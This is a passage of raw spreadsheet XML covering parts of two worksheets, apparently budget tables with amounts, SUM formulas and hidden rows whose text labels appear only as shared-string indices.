    <row r="95" spans="1:6" s="2" customFormat="1" ht="33" customHeight="1">
      <c r="B95" s="28" t="s">
        <v>281</v>
      </c>
      <c r="C95" s="28"/>
      <c r="D95" s="28">
        <f>SUM(D96:D97)</f>
        <v>308.59500000000003</v>
      </c>
      <c r="E95" s="28"/>
    </row>
    <row r="96" spans="1:6" ht="21.75" customHeight="1">
      <c r="A96" t="s">
        <v>237</v>
      </c>
      <c r="B96" s="6" t="s">
        <v>282</v>
      </c>
      <c r="C96" s="6" t="s">
        <v>283</v>
      </c>
      <c r="D96" s="6">
        <v>30</v>
      </c>
      <c r="E96" s="6"/>
    </row>
    <row r="97" spans="1:5" ht="31.5" customHeight="1">
      <c r="A97" t="s">
        <v>237</v>
      </c>
      <c r="B97" s="6" t="s">
        <v>284</v>
      </c>
      <c r="C97" s="6" t="s">
        <v>285</v>
      </c>
      <c r="D97" s="6">
        <v>278.59500000000003</v>
      </c>
      <c r="E97" s="6" t="s">
        <v>286</v>
      </c>
    </row>
    <row r="98" spans="1:5" ht="14.25" hidden="1">
      <c r="A98" t="s">
        <v>237</v>
      </c>
    </row>
    <row r="99" spans="1:5" ht="14.25" hidden="1">
      <c r="A99" t="s">
        <v>237</v>
      </c>
    </row>
    <row r="100" spans="1:5" ht="14.25" hidden="1">
      <c r="A100">
        <v>210</v>
      </c>
    </row>
    <row r="101" spans="1:5" ht="14.25" hidden="1">
      <c r="B101" t="s">
        <v>287</v>
      </c>
      <c r="D101">
        <f>SUM(D102)</f>
        <v>0</v>
      </c>
    </row>
    <row r="102" spans="1:5" ht="14.25" hidden="1">
      <c r="A102" t="s">
        <v>241</v>
      </c>
      <c r="B102" t="s">
        <v>288</v>
      </c>
      <c r="C102" t="s">
        <v>289</v>
      </c>
    </row>
    <row r="103" spans="1:5" ht="14.25" hidden="1">
      <c r="A103" t="s">
        <v>290</v>
      </c>
    </row>
    <row r="104" spans="1:5" ht="14.25" hidden="1">
      <c r="A104" t="s">
        <v>290</v>
      </c>
    </row>
    <row r="105" spans="1:5" ht="14.25" hidden="1">
      <c r="A105" t="s">
        <v>290</v>
      </c>
    </row>
    <row r="106" spans="1:5" s="2" customFormat="1" ht="35.25" customHeight="1">
      <c r="B106" s="28" t="s">
        <v>291</v>
      </c>
      <c r="C106" s="28"/>
      <c r="D106" s="28">
        <f>SUM(D107:D112)</f>
        <v>1272.7359999999999</v>
      </c>
      <c r="E106" s="28"/>
    </row>
    <row r="107" spans="1:5" ht="42" customHeight="1">
      <c r="A107" t="s">
        <v>292</v>
      </c>
      <c r="B107" s="6" t="s">
        <v>293</v>
      </c>
      <c r="C107" s="6" t="s">
        <v>294</v>
      </c>
      <c r="D107" s="6">
        <v>839.51599999999996</v>
      </c>
      <c r="E107" s="6"/>
    </row>
    <row r="108" spans="1:5" ht="21.75" customHeight="1">
      <c r="A108" t="s">
        <v>292</v>
      </c>
      <c r="B108" s="6" t="s">
        <v>295</v>
      </c>
      <c r="C108" s="6" t="s">
        <v>296</v>
      </c>
      <c r="D108" s="6">
        <v>120</v>
      </c>
      <c r="E108" s="6"/>
    </row>
    <row r="109" spans="1:5" ht="37.5" customHeight="1">
      <c r="A109" t="s">
        <v>292</v>
      </c>
      <c r="B109" s="6" t="s">
        <v>297</v>
      </c>
      <c r="C109" s="6" t="s">
        <v>298</v>
      </c>
      <c r="D109" s="6">
        <f>77.22+96</f>
        <v>173.22</v>
      </c>
      <c r="E109" s="6"/>
    </row>
    <row r="110" spans="1:5" ht="21.75" customHeight="1">
      <c r="A110" t="s">
        <v>292</v>
      </c>
      <c r="B110" s="6" t="s">
        <v>299</v>
      </c>
      <c r="C110" s="6" t="s">
        <v>300</v>
      </c>
      <c r="D110" s="6">
        <v>40</v>
      </c>
      <c r="E110" s="6"/>
    </row>
    <row r="111" spans="1:5" ht="14.25" hidden="1">
      <c r="A111" t="s">
        <v>292</v>
      </c>
      <c r="B111" t="s">
        <v>301</v>
      </c>
      <c r="C111" t="s">
        <v>302</v>
      </c>
      <c r="E111" t="s">
        <v>303</v>
      </c>
    </row>
    <row r="112" spans="1:5" ht="21.75" customHeight="1">
      <c r="A112" t="s">
        <v>292</v>
      </c>
      <c r="B112" s="6" t="s">
        <v>304</v>
      </c>
      <c r="C112" s="6" t="s">
        <v>305</v>
      </c>
      <c r="D112" s="6">
        <v>100</v>
      </c>
      <c r="E112" s="6"/>
    </row>
    <row r="113" spans="1:5" ht="14.25" hidden="1">
      <c r="A113" t="s">
        <v>292</v>
      </c>
    </row>
    <row r="114" spans="1:5" ht="14.25" hidden="1">
      <c r="A114" t="s">
        <v>292</v>
      </c>
    </row>
    <row r="115" spans="1:5" ht="14.25" hidden="1">
      <c r="A115" t="s">
        <v>292</v>
      </c>
    </row>
    <row r="116" spans="1:5" s="2" customFormat="1" ht="33.75" customHeight="1">
      <c r="B116" s="28" t="s">
        <v>306</v>
      </c>
      <c r="C116" s="28"/>
      <c r="D116" s="28">
        <f>SUM(D117:D119)</f>
        <v>5</v>
      </c>
      <c r="E116" s="28"/>
    </row>
    <row r="117" spans="1:5" ht="21.75" customHeight="1">
      <c r="A117" t="s">
        <v>239</v>
      </c>
      <c r="B117" s="6" t="s">
        <v>307</v>
      </c>
      <c r="C117" s="6" t="s">
        <v>308</v>
      </c>
      <c r="D117" s="6">
        <v>5</v>
      </c>
      <c r="E117" s="6"/>
    </row>
    <row r="118" spans="1:5" ht="14.25" hidden="1">
      <c r="A118" t="s">
        <v>239</v>
      </c>
    </row>
    <row r="119" spans="1:5" ht="14.25" hidden="1">
      <c r="A119" t="s">
        <v>239</v>
      </c>
    </row>
    <row r="120" spans="1:5" s="2" customFormat="1" ht="36" customHeight="1">
      <c r="B120" s="28" t="s">
        <v>309</v>
      </c>
      <c r="C120" s="28"/>
      <c r="D120" s="28">
        <f>SUM(D121:D128)</f>
        <v>394.5</v>
      </c>
      <c r="E120" s="28"/>
    </row>
    <row r="121" spans="1:5" ht="21.75" customHeight="1">
      <c r="A121" t="s">
        <v>240</v>
      </c>
      <c r="B121" s="6" t="s">
        <v>310</v>
      </c>
      <c r="C121" s="6" t="s">
        <v>311</v>
      </c>
      <c r="D121" s="6">
        <v>10</v>
      </c>
      <c r="E121" s="6"/>
    </row>
    <row r="122" spans="1:5" ht="21.75" customHeight="1">
      <c r="A122" t="s">
        <v>240</v>
      </c>
      <c r="B122" s="6" t="s">
        <v>312</v>
      </c>
      <c r="C122" s="6" t="s">
        <v>313</v>
      </c>
      <c r="D122" s="6">
        <f>4.2+39</f>
        <v>43.2</v>
      </c>
      <c r="E122" s="6"/>
    </row>
    <row r="123" spans="1:5" ht="21.75" customHeight="1">
      <c r="A123" t="s">
        <v>240</v>
      </c>
      <c r="B123" s="6" t="s">
        <v>314</v>
      </c>
      <c r="C123" s="6" t="s">
        <v>315</v>
      </c>
      <c r="D123" s="6">
        <v>51.3</v>
      </c>
      <c r="E123" s="6"/>
    </row>
    <row r="124" spans="1:5" ht="33.75" customHeight="1">
      <c r="A124" t="s">
        <v>240</v>
      </c>
      <c r="B124" s="6" t="s">
        <v>316</v>
      </c>
      <c r="C124" s="6" t="s">
        <v>317</v>
      </c>
      <c r="D124" s="6">
        <v>20</v>
      </c>
      <c r="E124" s="6"/>
    </row>
    <row r="125" spans="1:5" ht="21.75" customHeight="1">
      <c r="A125" t="s">
        <v>240</v>
      </c>
      <c r="B125" s="6" t="s">
        <v>318</v>
      </c>
      <c r="C125" s="6" t="s">
        <v>319</v>
      </c>
      <c r="D125" s="6">
        <v>66</v>
      </c>
      <c r="E125" s="6"/>
    </row>
    <row r="126" spans="1:5" ht="34.5" customHeight="1">
      <c r="A126" t="s">
        <v>240</v>
      </c>
      <c r="B126" s="6" t="s">
        <v>320</v>
      </c>
      <c r="C126" s="6" t="s">
        <v>321</v>
      </c>
      <c r="D126" s="6">
        <f>60+50+20+20+4</f>
        <v>154</v>
      </c>
      <c r="E126" s="6"/>
    </row>
    <row r="127" spans="1:5" ht="21.75" customHeight="1">
      <c r="A127" t="s">
        <v>240</v>
      </c>
      <c r="B127" s="6" t="s">
        <v>322</v>
      </c>
      <c r="C127" s="6" t="s">
        <v>323</v>
      </c>
      <c r="D127" s="6">
        <v>30</v>
      </c>
      <c r="E127" s="6"/>
    </row>
    <row r="128" spans="1:5" ht="21.75" customHeight="1">
      <c r="A128" t="s">
        <v>240</v>
      </c>
      <c r="B128" s="6" t="s">
        <v>324</v>
      </c>
      <c r="C128" s="6" t="s">
        <v>325</v>
      </c>
      <c r="D128" s="6">
        <v>20</v>
      </c>
      <c r="E128" s="6"/>
    </row>
    <row r="129" spans="1:1" ht="14.25" hidden="1">
      <c r="A129" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="130" spans="1:1" ht="14.25" hidden="1">
      <c r="A130" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="131" spans="1:1" ht="14.25" hidden="1">
      <c r="A131" t="s">
        <v>326</v>
      </c>
    </row>
    <row r="132" spans="1:1" ht="14.25" hidden="1">
      <c r="A132" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="133" spans="1:1" ht="14.25" hidden="1">
      <c r="A133" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="134" spans="1:1" ht="14.25" hidden="1">
      <c r="A134" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="135" spans="1:1" ht="14.25" hidden="1">
      <c r="A135" t="s">
        <v>326</v>
      </c>
    </row>
    <row r="136" spans="1:1" ht="14.25" hidden="1">
      <c r="A136" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="137" spans="1:1" ht="14.25" hidden="1">
      <c r="A137" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="138" spans="1:1" ht="14.25" hidden="1">
      <c r="A138" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="139" spans="1:1" ht="14.25" hidden="1">
      <c r="A139" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="140" spans="1:1" ht="14.25" hidden="1">
      <c r="A140" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="141" spans="1:1" ht="14.25" hidden="1">
      <c r="A141" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="142" spans="1:1" ht="14.25" hidden="1">
      <c r="A142" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="143" spans="1:1" ht="14.25" hidden="1">
      <c r="A143" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="144" spans="1:1" ht="14.25" hidden="1">
      <c r="A144" t="s">
        <v>241</v>
      </c>
    </row>
    <row r="145" spans="1:5" ht="14.25" hidden="1">
      <c r="A145" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="146" spans="1:5" ht="14.25" hidden="1">
      <c r="A146" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="147" spans="1:5" ht="14.25" hidden="1">
      <c r="A147" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="148" spans="1:5" ht="14.25" hidden="1">
      <c r="A148" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="149" spans="1:5" ht="14.25" hidden="1">
      <c r="A149" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="150" spans="1:5" ht="14.25" hidden="1">
      <c r="A150">
        <v>213</v>
      </c>
    </row>
    <row r="151" spans="1:5" ht="14.25" hidden="1">
      <c r="A151">
        <v>213</v>
      </c>
    </row>
    <row r="152" spans="1:5" s="2" customFormat="1" ht="27" customHeight="1">
      <c r="B152" s="28" t="s">
        <v>327</v>
      </c>
      <c r="C152" s="28"/>
      <c r="D152" s="28">
        <f>SUM(D153:D154)</f>
        <v>693.25</v>
      </c>
      <c r="E152" s="28"/>
    </row>
    <row r="153" spans="1:5" ht="21.75" customHeight="1">
      <c r="A153" t="s">
        <v>186</v>
      </c>
      <c r="B153" s="6" t="s">
        <v>328</v>
      </c>
      <c r="C153" s="6" t="s">
        <v>329</v>
      </c>
      <c r="D153" s="6">
        <f>50+90+5</f>
        <v>145</v>
      </c>
      <c r="E153" s="6" t="s">
        <v>330</v>
      </c>
    </row>
    <row r="154" spans="1:5" ht="21.75" customHeight="1">
      <c r="A154" t="s">
        <v>331</v>
      </c>
      <c r="B154" s="6" t="s">
        <v>332</v>
      </c>
      <c r="C154" s="6" t="s">
        <v>294</v>
      </c>
      <c r="D154" s="6">
        <f>548.25</f>
        <v>548.25</v>
      </c>
      <c r="E154" s="6" t="s">
        <v>286</v>
      </c>
    </row>
    <row r="155" spans="1:5" ht="14.25" hidden="1">
      <c r="A155" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="156" spans="1:5" ht="14.25" hidden="1">
      <c r="A156" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="157" spans="1:5" ht="14.25" hidden="1">
      <c r="A157">
        <v>213</v>
      </c>
    </row>
    <row r="158" spans="1:5" s="2" customFormat="1" ht="36.75" customHeight="1">
      <c r="B158" s="28" t="s">
        <v>333</v>
      </c>
      <c r="C158" s="28"/>
      <c r="D158" s="28">
        <f>SUM(D159:D166)</f>
        <v>807.83</v>
      </c>
      <c r="E158" s="28"/>
    </row>
    <row r="159" spans="1:5" ht="48" customHeight="1">
      <c r="A159" t="s">
        <v>239</v>
      </c>
      <c r="B159" s="6" t="s">
        <v>334</v>
      </c>
      <c r="C159" s="6" t="s">
        <v>335</v>
      </c>
      <c r="D159" s="6">
        <v>30.6</v>
      </c>
      <c r="E159" s="6"/>
    </row>
    <row r="160" spans="1:5" ht="32.25" customHeight="1">
      <c r="A160" t="s">
        <v>242</v>
      </c>
      <c r="B160" s="6" t="s">
        <v>336</v>
      </c>
      <c r="C160" s="6" t="s">
        <v>337</v>
      </c>
      <c r="D160" s="6">
        <v>260</v>
      </c>
      <c r="E160" s="6"/>
    </row>
    <row r="161" spans="1:5" ht="29.25" customHeight="1">
      <c r="A161" t="s">
        <v>242</v>
      </c>
      <c r="B161" s="6" t="s">
        <v>338</v>
      </c>
      <c r="C161" s="6" t="s">
        <v>339</v>
      </c>
      <c r="D161" s="6">
        <v>40.6</v>
      </c>
      <c r="E161" s="6"/>
    </row>
    <row r="162" spans="1:5" ht="21.75" customHeight="1">
      <c r="A162" t="s">
        <v>235</v>
      </c>
      <c r="B162" s="6" t="s">
        <v>340</v>
      </c>
      <c r="C162" s="6" t="s">
        <v>341</v>
      </c>
      <c r="D162" s="6">
        <v>30</v>
      </c>
      <c r="E162" s="6" t="s">
        <v>286</v>
      </c>
    </row>
    <row r="163" spans="1:5" ht="21.75" customHeight="1">
      <c r="A163" t="s">
        <v>242</v>
      </c>
      <c r="B163" s="6" t="s">
        <v>342</v>
      </c>
      <c r="C163" s="6" t="s">
        <v>343</v>
      </c>
      <c r="D163" s="6">
        <v>300</v>
      </c>
      <c r="E163" s="6"/>
    </row>
    <row r="164" spans="1:5" ht="60.75" customHeight="1">
      <c r="A164" t="s">
        <v>241</v>
      </c>
      <c r="B164" s="6" t="s">
        <v>344</v>
      </c>
      <c r="C164" s="6" t="s">
        <v>345</v>
      </c>
      <c r="D164" s="6">
        <v>96.63</v>
      </c>
      <c r="E164" s="6"/>
    </row>
    <row r="165" spans="1:5" ht="21.75" customHeight="1">
      <c r="A165" t="s">
        <v>242</v>
      </c>
      <c r="B165" s="6" t="s">
        <v>346</v>
      </c>
      <c r="C165" s="6" t="s">
        <v>347</v>
      </c>
      <c r="D165" s="6">
        <v>50</v>
      </c>
      <c r="E165" s="6"/>
    </row>
    <row r="166" spans="1:5" ht="14.25" hidden="1">
      <c r="A166" t="s">
        <v>242</v>
      </c>
    </row>
    <row r="167" spans="1:5" ht="14.25" hidden="1">
      <c r="A167" t="s">
        <v>242</v>
      </c>
    </row>
    <row r="168" spans="1:5" ht="14.25" hidden="1">
      <c r="A168" t="s">
        <v>242</v>
      </c>
    </row>
    <row r="169" spans="1:5" ht="14.25" hidden="1">
      <c r="A169" t="s">
        <v>238</v>
      </c>
    </row>
    <row r="170" spans="1:5" ht="14.25" hidden="1">
      <c r="A170" t="s">
        <v>238</v>
      </c>
    </row>
    <row r="171" spans="1:5" ht="14.25" hidden="1">
      <c r="A171" t="s">
        <v>242</v>
      </c>
    </row>
    <row r="172" spans="1:5" ht="14.25" hidden="1">
      <c r="A172" t="s">
        <v>242</v>
      </c>
    </row>
    <row r="173" spans="1:5" ht="14.25" hidden="1">
      <c r="B173" t="s">
        <v>348</v>
      </c>
    </row>
    <row r="174" spans="1:5" ht="14.25" hidden="1">
      <c r="A174" t="s">
        <v>349</v>
      </c>
      <c r="B174" t="s">
        <v>350</v>
      </c>
    </row>
    <row r="175" spans="1:5" ht="14.25" hidden="1">
      <c r="A175" t="s">
        <v>349</v>
      </c>
    </row>
    <row r="176" spans="1:5" ht="14.25" hidden="1">
      <c r="A176" t="s">
        <v>349</v>
      </c>
    </row>
    <row r="177" spans="1:4" ht="14.25" hidden="1">
      <c r="B177" t="s">
        <v>351</v>
      </c>
      <c r="D177">
        <f>SUM(D178)</f>
        <v>0</v>
      </c>
    </row>
    <row r="178" spans="1:4" ht="14.25" hidden="1">
      <c r="B178" t="s">
        <v>352</v>
      </c>
      <c r="C178" t="s">
        <v>353</v>
      </c>
    </row>
    <row r="179" spans="1:4" ht="14.25" hidden="1">
      <c r="B179" t="s">
        <v>354</v>
      </c>
    </row>
    <row r="180" spans="1:4" ht="14.25" hidden="1">
      <c r="A180">
        <v>230</v>
      </c>
    </row>
    <row r="181" spans="1:4" ht="14.25" hidden="1">
      <c r="B181" t="s">
        <v>355</v>
      </c>
    </row>
    <row r="182" spans="1:4" ht="14.25" hidden="1">
      <c r="B182" t="s">
        <v>356</v>
      </c>
    </row>
    <row r="183" spans="1:4" ht="14.25" hidden="1">
      <c r="A183">
        <v>229</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A3:E183">
    <filterColumn colId="3">
      <customFilters>
        <customFilter operator="notEqual" val=""/>
      </customFilters>
    </filterColumn>
  </autoFilter>
  <mergeCells count="1">
    <mergeCell ref="A1:E1"/>
  </mergeCells>
  <phoneticPr fontId="10" type="noConversion"/>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.34930555555555598" right="0.34930555555555598" top="0.58888888888888902" bottom="0.58888888888888902" header="0.50902777777777797" footer="0.30902777777777801"/>
  <pageSetup paperSize="9" firstPageNumber="5" orientation="landscape" useFirstPageNumber="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H26"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="D26" sqref="D26"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="45.75" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="25.125" customWidth="1"/>
    <col min="2" max="2" width="9.25" customWidth="1"/>
    <col min="3" max="3" width="9.625" customWidth="1"/>
    <col min="4" max="4" width="8.875" customWidth="1"/>
    <col min="5" max="5" width="37.75" style="7" customWidth="1"/>
    <col min="6" max="6" width="11.625" customWidth="1"/>
    <col min="7" max="7" width="8.875" customWidth="1"/>
    <col min="8" max="8" width="9.75" customWidth="1"/>
    <col min="9" max="9" width="6.625" customWidth="1"/>
    <col min="10" max="10" width="11" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="22.5">
      <c r="A1" s="65" t="s">
        <v>357</v>
      </c>
      <c r="B1" s="66"/>
      <c r="C1" s="66"/>
      <c r="D1" s="66"/>
      <c r="E1" s="66"/>
      <c r="F1" s="66"/>
    </row>
    <row r="3" spans="1:8">
      <c r="F3" s="8" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="4" spans="1:8">
      <c r="A4" s="67" t="s">
        <v>358</v>
      </c>
      <c r="B4" s="68"/>
      <c r="C4" s="68"/>
      <c r="D4" s="69"/>
      <c r="E4" s="67" t="s">
        <v>359</v>
      </c>
      <c r="F4" s="68"/>
      <c r="G4" s="68"/>
      <c r="H4" s="69"/>
    </row>
    <row r="5" spans="1:8" ht="28.5">
      <c r="A5" s="9" t="s">
        <v>360</v>
      </c>
      <c r="B5" s="10" t="s">
        <v>361</v>
      </c>
      <c r="C5" s="11" t="s">
        <v>7</v>
      </c>
      <c r="D5" s="11" t="s">
        <v>10</v>
      </c>
      <c r="E5" s="12" t="s">
        <v>360</v>
      </c>
      <c r="F5" s="10" t="s">
        <v>361</v>
      </c>
      <c r="G5" s="11" t="s">
        <v>7</v>
      </c>
      <c r="H5" s="11" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="6" spans="1:8" ht="18" customHeight="1">
      <c r="A6" s="13" t="s">
        <v>362</v>
      </c>
      <c r="B6" s="14">
        <f>SUM(B7:B17)</f>
        <v>128580</v>
      </c>
      <c r="C6" s="14">
        <f>SUM(C7:C17)</f>
        <v>120000</v>
      </c>
      <c r="D6" s="14">
        <f>SUM(D7:D17)</f>
        <v>248580</v>
      </c>
      <c r="E6" s="15" t="s">
        <v>363</v>
      </c>
      <c r="F6" s="14">
        <f t="shared" ref="F6" si="0">SUM(F7:F22)</f>
        <v>68321</v>
      </c>
      <c r="G6" s="14">
        <f>SUM(G7:G22)</f>
        <v>-14941</v>
      </c>
      <c r="H6" s="14">
        <f>SUM(H7:H22)</f>
        <v>53380</v>
      </c>
    </row>
    <row r="7" spans="1:8" ht="18" customHeight="1">
      <c r="A7" s="13" t="s">
        <v>364</v>
      </c>
      <c r="B7" s="14"/>
      <c r="C7" s="14"/>
      <c r="D7" s="14">
        <f>B7+C7</f>
        <v>0</v>
      </c>
      <c r="E7" s="16" t="s">
        <v>365</v>
      </c>
      <c r="F7" s="17"/>
      <c r="G7" s="18"/>
      <c r="H7" s="3">
        <f>F7+G7</f>
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="1:8" ht="18" customHeight="1">
      <c r="A8" s="19" t="s">
        <v>366</v>
      </c>
      <c r="B8" s="17">
        <v>120000</v>
      </c>
      <c r="C8" s="17">
        <v>120000</v>
      </c>
      <c r="D8" s="14">
        <f t="shared" ref="D8" si="1">B8+C8</f>
        <v>240000</v>
      </c>
      <c r="E8" s="20" t="s">
        <v>367</v>
      </c>
      <c r="F8" s="17"/>
      <c r="G8" s="18"/>
      <c r="H8" s="3">
        <f t="shared" ref="H8" si="2">F8+G8</f>
        <v>0</v>
      </c>
    </row>
    <row r="9" spans="1:8" ht="18" customHeight="1">
      <c r="A9" s="16" t="s">
        <v>368</v>
      </c>
      <c r="B9" s="17">
        <v>630</v>
      </c>
      <c r="C9" s="17"/>
      <c r="D9" s="14">
        <f t="shared" ref="D9:D19" si="3">B9+C9</f>
        <v>630</v>
      </c>
      <c r="E9" s="19" t="s">
        <v>369</v>
      </c>
      <c r="F9" s="17">
        <f>120000-62790-269+4+40-1697+4453</f>
        <v>59741</v>
      </c>
      <c r="G9" s="18">
        <v>-14941</v>
      </c>
      <c r="H9" s="3">
        <f t="shared" ref="H9:H25" si="4">F9+G9</f>
        <v>44800</v>
      </c>
    </row>
    <row r="10" spans="1:8" ht="18" customHeight="1">
      <c r="A10" s="16" t="s">
        <v>370</v>
      </c>
      <c r="B10" s="17">
        <v>5800</v>
      </c>
      <c r="C10" s="17"/>
      <c r="D10" s="14">
        <f t="shared" si="3"/>
        <v>5800</v>
      </c>
      <c r="E10" s="16" t="s">
        <v>371</v>
      </c>
      <c r="F10" s="17">
        <v>630</v>
      </c>
      <c r="G10" s="18"/>
      <c r="H10" s="3">
        <f t="shared" si="4"/>
        <v>630</v>
      </c>
    </row>
    <row r="11" spans="1:8" ht="18" customHeight="1">
      <c r="A11" s="16" t="s">
        <v>372</v>
      </c>
      <c r="B11" s="17">
        <v>800</v>
      </c>
      <c r="C11" s="17"/>
      <c r="D11" s="14">
        <f t="shared" si="3"/>
        <v>800</v>
      </c>
      <c r="E11" s="16" t="s">
        <v>373</v>
      </c>
      <c r="F11" s="17">
        <v>5800</v>
      </c>
      <c r="G11" s="18"/>
      <c r="H11" s="3">
        <f t="shared" si="4"/>
        <v>5800</v>
      </c>
    </row>
    <row r="12" spans="1:8" ht="18" customHeight="1">
      <c r="A12" s="16" t="s">
        <v>374</v>
      </c>
      <c r="B12" s="17">
        <v>500</v>
      </c>
      <c r="C12" s="17"/>
      <c r="D12" s="14">
        <f t="shared" si="3"/>
        <v>500</v>
      </c>
      <c r="E12" s="16" t="s">
        <v>375</v>
      </c>
      <c r="F12" s="17">
        <v>800</v>
      </c>
      <c r="G12" s="18"/>
      <c r="H12" s="3">
        <f t="shared" si="4"/>
        <v>800</v>
      </c>
    </row>
    <row r="13" spans="1:8" ht="18" customHeight="1">
      <c r="A13" s="16" t="s">
        <v>376</v>
      </c>
      <c r="B13" s="17">
        <v>650</v>
      </c>
      <c r="C13" s="17"/>
      <c r="D13" s="14">
        <f t="shared" si="3"/>
        <v>650</v>
      </c>
      <c r="E13" s="16" t="s">
        <v>377</v>
      </c>
      <c r="F13" s="17"/>
      <c r="G13" s="18"/>
      <c r="H13" s="3">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:8" ht="18" customHeight="1">
      <c r="A14" s="16" t="s">
        <v>378</v>
      </c>
      <c r="B14" s="17"/>
      <c r="C14" s="17"/>
      <c r="D14" s="14">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E14" s="16" t="s">
        <v>379</v>
      </c>
      <c r="F14" s="17">
        <v>500</v>
      </c>
      <c r="G14" s="18"/>
      <c r="H14" s="3">
        <f t="shared" si="4"/>
        <v>500</v>
      </c>
    </row>
    <row r="15" spans="1:8" ht="18" customHeight="1">
      <c r="A15" s="16" t="s">
        <v>380</v>
      </c>
      <c r="B15" s="17"/>
      <c r="C15" s="17"/>
      <c r="D15" s="14">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E15" s="16" t="s">
        <v>381</v>
      </c>
      <c r="F15" s="17"/>
      <c r="G15" s="18"/>
      <c r="H15" s="3">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="16" spans="1:8" ht="18" customHeight="1">
      <c r="A16" s="16" t="s">
        <v>382</v>
      </c>
      <c r="B16" s="17">
        <v>200</v>
      </c>
      <c r="C16" s="17"/>
      <c r="D16" s="14">
        <f t="shared" si="3"/>
        <v>200</v>
      </c>
      <c r="E16" s="16" t="s">
        <v>383</v>
      </c>
      <c r="F16" s="17"/>
      <c r="G16" s="18"/>
      <c r="H16" s="3">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:8" ht="18" customHeight="1">
      <c r="A17" s="16" t="s">
        <v>384</v>
      </c>
      <c r="B17" s="17">
        <v>0</v>
      </c>
      <c r="C17" s="17"/>
      <c r="D17" s="14">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E17" s="16" t="s">
        <v>385</v>
      </c>
      <c r="F17" s="17">
        <v>650</v>
      </c>
      <c r="G17" s="18"/>
      <c r="H17" s="3">
        <f t="shared" si="4"/>
        <v>650</v>
      </c>
    </row>
    <row r="18" spans="1:8" ht="18" customHeight="1">
      <c r="A18" s="16" t="s">
        <v>386</v>
      </c>
      <c r="B18" s="17"/>
      <c r="C18" s="17"/>
      <c r="D18" s="14">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E18" s="16" t="s">
        <v>387</v>
      </c>
      <c r="F18" s="17">
        <v>0</v>
      </c>
      <c r="G18" s="18"/>
      <c r="H18" s="3">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="19" spans="1:8" ht="18" customHeight="1">
      <c r="A19" s="16" t="s">
        <v>388</v>
      </c>
      <c r="B19" s="17"/>
      <c r="C19" s="17"/>
      <c r="D19" s="14">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="E19" s="16" t="s">
        <v>389</v>
      </c>
      <c r="F19" s="17"/>
      <c r="G19" s="18"/>
      <c r="H19" s="3">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="20" spans="1:8" ht="18" customHeight="1">
      <c r="A20" s="16"/>
      <c r="B20" s="17"/>
      <c r="C20" s="17"/>
      <c r="D20" s="17"/>
      <c r="E20" s="20" t="s">
        <v>390</v>
      </c>
      <c r="F20" s="17">
        <v>200</v>
      </c>
      <c r="G20" s="18"/>
      <c r="H20" s="3">
        <f t="shared" si="4"/>
        <v>200</v>
      </c>
    </row>
    <row r="21" spans="1:8" ht="18" customHeight="1">
      <c r="A21" s="21"/>
      <c r="B21" s="21"/>
      <c r="C21" s="21"/>
      <c r="D21" s="21"/>
      <c r="E21" s="16" t="s">
        <v>391</v>
      </c>
      <c r="F21" s="17">
        <v>0</v>
      </c>
      <c r="G21" s="18"/>
      <c r="H21" s="3">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:8" ht="18" customHeight="1">
      <c r="A22" s="21"/>
      <c r="B22" s="21"/>
      <c r="C22" s="21"/>
      <c r="D22" s="21"/>
      <c r="E22" s="16" t="s">
        <v>392</v>
      </c>
      <c r="F22" s="17"/>
      <c r="G22" s="18"/>
      <c r="H22" s="3">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="23" spans="1:8" ht="18" customHeight="1">
      <c r="A23" s="21"/>
      <c r="B23" s="21"/>
      <c r="C23" s="21"/>
      <c r="D23" s="21"/>
      <c r="E23" s="16" t="s">
        <v>393</v>
      </c>
      <c r="F23" s="17"/>
      <c r="G23" s="18"/>
      <c r="H23" s="3">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="24" spans="1:8" ht="18" customHeight="1">
      <c r="A24" s="21"/>
      <c r="B24" s="21"/>
      <c r="C24" s="21"/>
      <c r="D24" s="21"/>
      <c r="E24" s="16" t="s">
        <v>394</v>
      </c>
      <c r="F24" s="17">
        <v>60259</v>
      </c>
      <c r="G24" s="18">
        <v>134941</v>
      </c>
